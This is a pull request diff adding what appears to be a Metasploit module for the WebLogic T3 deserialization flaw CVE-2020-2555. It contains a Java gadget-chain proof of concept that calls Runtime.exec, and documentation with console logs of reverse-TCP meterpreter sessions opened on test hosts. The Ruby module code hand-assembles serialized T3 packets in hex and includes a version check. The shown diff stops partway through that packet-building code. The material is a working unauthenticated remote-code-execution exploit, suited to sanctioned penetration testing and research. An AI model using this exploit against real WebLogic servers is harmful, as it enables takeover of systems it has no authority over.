### PR TITLE
Add WebLogic Exploit for CVE-2020-2555

### DIFF
--- a/data/exploits/CVE-2020-2555/Weblogic_2555.java
+++ b/data/exploits/CVE-2020-2555/Weblogic_2555.java
@@ -1,0 +1,54 @@
+import com.tangosol.util.filter.LimitFilter;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+
+/*
+ *  BadAttributeValueExpException.readObject()
+ *  com.tangosol.util.filter.LimitFilter.toString()
+ *  com.tangosol.util.extractor.ChainedExtractor.extract()
+ *  com.tangosol.util.extractor.ReflectionExtractor.extract()
+ *  Method.invoke()
+ *  Runtime.exec()
+ *
+ *  PoC by Y4er
+ */
+public class Weblogic_2555
+{
+	public static void main(String args[]) throws Exception
+	{
+		ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+		ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+		ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+		ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
+		ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+		LimitFilter limitFilter = new LimitFilter();
+
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, chainedExt);
+
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+
+		BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+		Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
+		field.setAccessible(true);
+		field.set(badAttributeValueExpException, limitFilter);
+
+		// Serialize object & save to file
+		FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(badAttributeValueExpException);
+		os.close();
+
+	}
+}

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -19,7 +19,7 @@
   
   Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
   
-  On step 10 of the installation instructions keep the
+  On step 10 of the installation instructions, keep the
   `Run Quickstart` box checked and click `done`. A new window
   should pop up. Select `Create a new domain` -> `next`.
   Ensure `Basic WebLogic Server Domain` is selected and click `next`.

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -28,7 +28,7 @@
   and select `Create`. Click `next` a couple more times, then click
   `finish`.
 
-  To start WebLogic, execute either the `startWebLogic` script in
+  To start WebLogic, execute the `startWebLogic` script in
   `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.
 
 ## Verification Steps
@@ -71,7 +71,7 @@
   Meterpreter     : x86/windows
   ```
 
-### WebLogic `v12.1.3.0.0` on Linux
+### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux
   
   ```
   msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -14,7 +14,7 @@
   
 ### Installation
 
-  Some version of Java 8 jdk is required to be installed on the server.
+  Some version of Java 8 JDK is required to be installed on the server.
   This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).
   
   Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -24,7 +24,7 @@
   should pop up. Select `Create a new domain` -> `next`.
   Ensure `Basic WebLogic Server Domain` is selected and click `next`.
   Create credentials and select `next`. Domain mode can be either
-  `Production` or `Development`, click `next`. Click `next` again
+  `Production` or `Development`, then click `next`. Click `next` again
   and select `Create`. Click `next` a couple more times, then click
   `finish`.
 

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -14,7 +14,10 @@
   
 ### Installation
 
-  Installation instructions can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
+  Some version of Java 8 jdk is required to be installed on the server.
+  This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).
+  
+  Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
   
   On step 10 of the installation instructions keep the
   `Run Quickstart` box checked and click `done`. A new window
@@ -30,12 +33,12 @@
 
 ## Verification Steps
 
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
-  4. Do: ```set RHOSTS <ip>```
-  5. Do: ```run```
-  6. You should get a meterpreter session.
+- [ ] Install the application
+- [ ] Start msfconsole
+- [ ] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
+- [ ] Do: ```set RHOSTS <ip>```
+- [ ] Do: ```run```
+- [ ] You should get a meterpreter session.
 
 ## Scenarios
 ### WebLogic `v12.2.1.4` on Windows 10

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -1,0 +1,99 @@
+## Vulnerable Application
+
+  There exists an object deserialization vulnerability
+  in multiple versions of WebLogic.
+
+  Unauthenticated remote code execution can be achieved
+  by sending a serialized BadAttributeValueExpException object
+  over T3 to vulnerable WebLogic servers.
+
+  This module has been tested against versions `v12.1.3.0.0`,
+  `v12.2.1.3.0`, and `v12.2.1.4.0`.
+
+  WebLogic versions can be downloaded from [here](https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html).
+  
+### Installation
+
+  Installation instructions can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
+  
+  On step 10 of the installation instructions keep the
+  `Run Quickstart` box checked and click `done`. A new window
+  should pop up. Select `Create a new domain` -> `next`.
+  Ensure `Basic WebLogic Server Domain` is selected and click `next`.
+  Create credentials and select `next`. Domain mode can be either
+  `Production` or `Development`, click `next`. Click `next` again
+  and select `Create`. Click `next` a couple more times, then click
+  `finish`.
+
+  To start WebLogic, execute either the `startWebLogic` script in
+  `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
+  4. Do: ```set RHOSTS <ip>```
+  5. Do: ```run```
+  6. You should get a meterpreter session.
+
+## Scenarios
+### WebLogic `v12.2.1.4` on Windows 10
+
+  ```
+  msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185
+  rhosts => 172.16.215.185
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1
+  lhost => 172.16.215.1
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444
+  [*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0
+  [*] 172.16.215.185:7001 - Sending handshake...
+  [*] 172.16.215.185:7001 - Formatting payload...
+  [*] 172.16.215.185:7001 - Sending object...
+  [*] Sending stage (176195 bytes) to 172.16.215.185
+  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500
+
+  meterpreter > getuid
+  Server username: DESKTOP-AQT4EG1\space
+  meterpreter > sysinfo
+  Computer        : DESKTOP-AQT4EG1
+  OS              : Windows 10 (10.0 Build 18362).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 4
+  Meterpreter     : x86/windows
+  ```
+
+### WebLogic `v12.1.3.0.0` on Linux
+  
+  ```
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
+  target => 1
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
+  rhosts => 172.16.215.196
+  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444 
+  [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
+  [*] 172.16.215.196:7001 - Sending handshake...
+  [*] 172.16.215.196:7001 - Formatting payload...
+  [*] 172.16.215.196:7001 - Sending object...
+  [*] Sending stage (3012516 bytes) to 172.16.215.196
+  [*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
+  [*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)
+
+  meterpreter > getuid
+  Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
+  meterpreter > sysinfo
+  Computer     : 172.16.215.196
+  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  ```

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-  There exists an object deserialization vulnerability
+  There exists a Java object deserialization vulnerability
   in multiple versions of WebLogic.
 
   Unauthenticated remote code execution can be achieved

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -4,8 +4,8 @@
   in multiple versions of WebLogic.
 
   Unauthenticated remote code execution can be achieved
-  by sending a serialized BadAttributeValueExpException object
-  over T3 to vulnerable WebLogic servers.
+  by sending a serialized `BadAttributeValueExpException` object
+  over the T3 protocol to vulnerable WebLogic servers.
 
   This module has been tested against versions `v12.1.3.0.0`,
   `v12.2.1.3.0`, and `v12.2.1.4.0`.

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
@@ -11,14 +11,14 @@
   `v12.2.1.3.0`, and `v12.2.1.4.0`.
 
   WebLogic versions can be downloaded from [here](https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html).
-  
+
 ### Installation
 
   Some version of Java 8 JDK is required to be installed on the server.
   This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).
-  
+
   Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).
-  
+
   On step 10 of the installation instructions, keep the
   `Run Quickstart` box checked and click `done`. A new window
   should pop up. Select `Create a new domain` -> `next`.
@@ -72,7 +72,7 @@
   ```
 
 ### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux
-  
+
   ```
   msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
   target => 1

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Exploit::Remote::Tcp
   include Exploit::CmdStager
-  include Exploit::Powershell
+  include Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
@@ -34,16 +34,16 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Windows',
             {
-              'Platform' => 'win',
-              'DefaultOptions'  =>  { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
+              'Platform'        => 'win',
+              'DefaultOptions'  => { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
             }
           ],
           [
             'Unix',
             {
-              'Platform' => %w{ unix linux },
+              'Platform'        => %w{ unix linux },
               'CmdStagerFlavor' => 'printf',
-              'DefaultOptions'  =>  { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }
+              'DefaultOptions'  => { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }
             }
           ],
         ],
@@ -51,11 +51,34 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0
     ))
 
-    register_options([ Opt::RPORT(7001) ])
+    register_options(
+    [
+      Opt::RPORT(7001),
+      OptString.new('TARGETURI', [ true, 'Base path to Weblogic installation', '/' ])
+    ])
+
+    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
   end
 
   def check
-    Exploit::CheckCode::Vulnerable
+    weblogic_uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  weblogic_uri
+    )
+
+    versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
+
+    return CheckCode::Unknown('Failed to obtain response from service') unless res
+    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res.body
+    return CheckCode::Unknown('Failed to detect WebLogic') unless version
+
+    @version_no = version
+    print_status("WebLogic version detected: #{@version_no}")
+
+    return CheckCode::Appears if versions.include?(Gem::Version.new(@version_no))
+
+    CheckCode::Detected('Version of WebLogic is not vulnerable')
   end
 
   def t3_handshake

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Exploit::Remote::Tcp
   include Exploit::CmdStager
+  include Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -28,23 +29,21 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
         ],
       'Platform'       => %w{ unix linux win },
-      'Payload'        =>
-        {
-        },
       'Targets'        =>
         [
           [
             'Windows',
             {
               'Platform' => 'win',
+              'DefaultOptions'  =>  { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
             }
           ],
           [
             'Unix',
             {
               'Platform' => %w{ unix linux },
-              #'DefaultOptions'  => { 'Payload'  => 'cmd/unix/reverse' }
-              'CmdStagerFlavor' => 'printf'
+              'CmdStagerFlavor' => 'printf',
+              'DefaultOptions'  =>  { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }
             }
           ],
         ],
@@ -377,12 +376,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Original data
     # ---------------------------
-    # payload_obj << '740007'                               # String, length: 7
-    # payload_obj << '2f62696e2f7368'                       # /bin/sh
-    # payload_obj << '740002'                               # String, length: 2
-    # payload_obj << '2d63'                                 # -c
-    # payload_obj << '740017'                               # String, length: 23
-    # payload_obj << '746f756368202f746d70'                 # touch /tmp/blah_ze_blah
+    # payload_obj << '740007'                             # String, length: 7
+    # payload_obj << '2f62696e2f7368'                     # /bin/sh
+    # payload_obj << '740002'                             # String, length: 2
+    # payload_obj << '2d63'                               # -c
+    # payload_obj << '740017'                             # String, length: 23
+    # payload_obj << '746f756368202f746d70'               # touch /tmp/blah_ze_blah
     # payload_obj << '2f626c61685f7a655f62'
     # payload_obj << '6c6168'
     # ---------------------------
@@ -400,8 +399,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def t3_send(payload_obj)
-    request_obj = '000009f3'                                            # Original packet length
-    request_obj << '016501'                                             # CMD_IDENTIFY_REQUEST, flags
+    print_status('Sending object...')
+
+    request_obj = '000009f3'                              # Original packet length
+    request_obj << '016501'                               # CMD_IDENTIFY_REQUEST, flags
     request_obj << 'ffffffffffffffff'
     request_obj << '00000071'
     request_obj << '0000ea60'
@@ -415,171 +416,171 @@ class MetasploitModule < Msf::Exploit::Remote
     request_obj << '700000000c0000000200'
     request_obj << '00000000000000000000'
     request_obj << '01007006'
-    request_obj << 'fe010000'                                           # separator
-    request_obj << 'aced0005'                                           # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                               # TC_OBJECT, TC_CLASSDESC
-    request_obj << '001d'                                               # Class name length: 29
-    request_obj << '7765626c6f6769632e72'                               # weblogic.rjvm.ClassTableEntry
+    request_obj << 'fe010000'                             # separator
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d'                                 # Class name length: 29
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.ClassTableEntry
     request_obj << '6a766d2e436c61737354'
     request_obj << '61626c65456e747279'
-    request_obj << '2f52658157f4f9ed'                                   # SerialVersionUID
-    request_obj << '0c0000'                                             # flags?
-    request_obj << '787072'                                             # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
-    request_obj << '0024'                                               # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                               # weblogic.common.internal.PackageInfo
+    request_obj << '2f52658157f4f9ed'                     # SerialVersionUID
+    request_obj << '0c0000'                               # flags?
+    request_obj << '787072'                               # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0024'                                 # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PackageInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5061636b61'
     request_obj << '6765496e666f'
-    request_obj << 'e6f723e7b8ae1ec9'                                   # SerialVersionUID
-    request_obj << '020009'                                             # Serializable, 9 fields
-    request_obj << '490005'                                             # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                                         # major
-    request_obj << '490005'                                             # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                                         # minor
-    request_obj << '49000b'                                             # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                               # patchUpdate
+    request_obj << 'e6f723e7b8ae1ec9'                     # SerialVersionUID
+    request_obj << '020009'                               # Serializable, 9 fields
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                           # major
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                           # minor
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                 # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                                             # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                               # rollingPatch
+    request_obj << '49000c'                               # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                 # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                                             # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                               # servicePack
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                 # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                                             # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                               # temporaryPatch
+    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                 # temporaryPatch
     request_obj << '61746368'
-    request_obj << '4c0009'                                             # Field type: Object, field name length: 9
-    request_obj << '696d706c5469746c65'                                 # implTitle
-    request_obj << '740012'                                             # String, length: 18
-    request_obj << '4c6a6176612f6c616e67'                               # Ljava/lang/String;
+    request_obj << '4c0009'                               # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65'                   # implTitle
+    request_obj << '740012'                               # String, length: 18
+    request_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
     request_obj << '2f537472696e673b'
-    request_obj << '4c000a'                                             # Field type: Object, field name length: 10
-    request_obj << '696d706c56656e646f72'                               # implVendor
-    request_obj << '71007e0003'                                         # TC_REFERENCE, handle
-    request_obj << '4c000b'                                             # Field type: Object, field name length: 11
-    request_obj << '696d706c56657273696f6e'                             # implVersion
-    request_obj << '71007e0003'                                         # TC_REFERENCE, handle
-    request_obj << '7870'                                               # TC_ENDBLOCKDATA, TC_NULL
-    request_obj << '7702'                                               # TC_ENDBLOCKDATA
+    request_obj << '4c000a'                               # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72'                 # implVendor
+    request_obj << '71007e0003'                           # TC_REFERENCE, handle
+    request_obj << '4c000b'                               # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f6e'               # implVersion
+    request_obj << '71007e0003'                           # TC_REFERENCE, handle
+    request_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702'                                 # TC_ENDBLOCKDATA
     request_obj << '000078'
-    request_obj << 'fe010000'                                           # separator
+    request_obj << 'fe010000'                             # separator
 
     request_obj << payload_obj
 
-    request_obj << 'fe010000'                                            # separator
-    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
-    request_obj << '001d'                                                # Class name length: 29
-    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.ClassTableEntry
+    request_obj << 'fe010000'                             # separator
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d'                                 # Class name length: 29
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.ClassTableEntry
     request_obj << '6a766d2e436c61737354'
     request_obj << '61626c65456e747279'
-    request_obj << '2f52658157f4f9ed'                                    # SerialVersionUID
+    request_obj << '2f52658157f4f9ed'                     # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787072'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
-    request_obj << '0021'                                                # Class name length: 33
-    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.PeerInfo
+    request_obj << '787072'                               # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0021'                                 # Class name length: 33
+    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PeerInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5065657249'
     request_obj << '6e666f'
-    request_obj << '585474f39bc908f1'                                    # SerialVersionUID
-    request_obj << '020007'                                              # Serializable, 7 fields
-    request_obj << '490005'                                              # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                                          # major
-    request_obj << '490005'                                              # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                                          # minor
-    request_obj << '49000b'                                              # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                                # patchUpdate
+    request_obj << '585474f39bc908f1'                     # SerialVersionUID
+    request_obj << '020007'                               # Serializable, 7 fields
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                           # major
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                           # minor
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                 # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                                              # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                                # rollingPatch
+    request_obj << '49000c'                               # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                 # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                                              # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                                # servicePack
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                 # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                                              # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                                # temporaryPatch
+    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                 # temporaryPatch
     request_obj << '61746368'
-    request_obj << '5b0008'                                              # Field type: Array, field name length: 8
-    request_obj << '7061636b61676573'                                    # packages
-    request_obj << '740027'                                              # String, length: 39
-    request_obj << '5b4c7765626c6f676963'                                # [Lweblogic/common/internal/PackageInfo;
+    request_obj << '5b0008'                               # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573'                     # packages
+    request_obj << '740027'                               # String, length: 39
+    request_obj << '5b4c7765626c6f676963'                 # [Lweblogic/common/internal/PackageInfo;
     request_obj << '2f636f6d6d6f6e2f696e'
     request_obj << '7465726e616c2f506163'
     request_obj << '6b616765496e666f3b'
-    request_obj << '7872'                                                # TC_ENDBLOCKDATA, TC_CLASSDESC
-    request_obj << '0024'                                                # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.VersionInfo
+    request_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024'                                 # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.VersionInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5665727369'
     request_obj << '6f6e496e666f'
-    request_obj << '972245516452463e'                                    # SerialVersionUID
-    request_obj << '020003'                                              # Serializable, 3 fields
-    request_obj << '5b0008'                                              # Field type: Array, field name length: 8
-    request_obj << '7061636b61676573'                                    # packages
-    request_obj << '71007e0003'                                          # TC_REFERENCE, handle
-    request_obj << '4c000e'                                              # Field type: Object, field name length: 14
-    request_obj << '72656c65617365566572'                                # releaseVersion
+    request_obj << '972245516452463e'                     # SerialVersionUID
+    request_obj << '020003'                               # Serializable, 3 fields
+    request_obj << '5b0008'                               # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573'                     # packages
+    request_obj << '71007e0003'                           # TC_REFERENCE, handle
+    request_obj << '4c000e'                               # Field type: Object, field name length: 14
+    request_obj << '72656c65617365566572'                 # releaseVersion
     request_obj << '73696f6e'
-    request_obj << '740012'                                              # String, length: 18
-    request_obj << '4c6a6176612f6c616e67'                                # Ljava/lang/String;
+    request_obj << '740012'                               # String, length: 18
+    request_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
     request_obj << '2f537472696e673b'
-    request_obj << '5b0012'                                              # Field type: Array, field name length: 18
-    request_obj << '76657273696f6e496e66'                                # versionInfoAsBytes
+    request_obj << '5b0012'                               # Field type: Array, field name length: 18
+    request_obj << '76657273696f6e496e66'                 # versionInfoAsBytes
     request_obj << '6f41734279746573'
-    request_obj << '740002'                                              # String, length: 2
-    request_obj << '5b42'                                                # [B
-    request_obj << '7872'                                                # TC_ENDBLOCKDATA, TC_CLASSDESC
-    request_obj << '0024'                                                # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.PackageInfo
+    request_obj << '740002'                               # String, length: 2
+    request_obj << '5b42'                                 # [B
+    request_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024'                                 # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PackageInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5061636b61'
     request_obj << '6765496e666f'
-    request_obj << 'e6f723e7b8ae1ec9'                                    # SerialVersionUID
-    request_obj << '020009'                                              # Serializable, 9 fields
-    request_obj << '490005'                                              # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                                          # major
-    request_obj << '490005'                                              # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                                          # minor
-    request_obj << '49000b'                                              # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                                # patchUpdate
+    request_obj << 'e6f723e7b8ae1ec9'                     # SerialVersionUID
+    request_obj << '020009'                               # Serializable, 9 fields
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                           # major
+    request_obj << '490005'                               # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                           # minor
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                 # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                                              # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                                # rollingPatch
+    request_obj << '49000c'                               # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                 # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                                              # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                                # servicePack
+    request_obj << '49000b'                               # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                 # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                                              # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                                # temporaryPatch
+    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                 # temporaryPatch
     request_obj << '61746368'
-    request_obj << '4c0009'                                              # Field type: Object, field name length: 9
-    request_obj << '696d706c5469746c65'                                  # implTitle
-    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
-    request_obj << '4c000a'                                              # Field type: Object, field name length: 10
-    request_obj << '696d706c56656e646f72'                                # implVendor
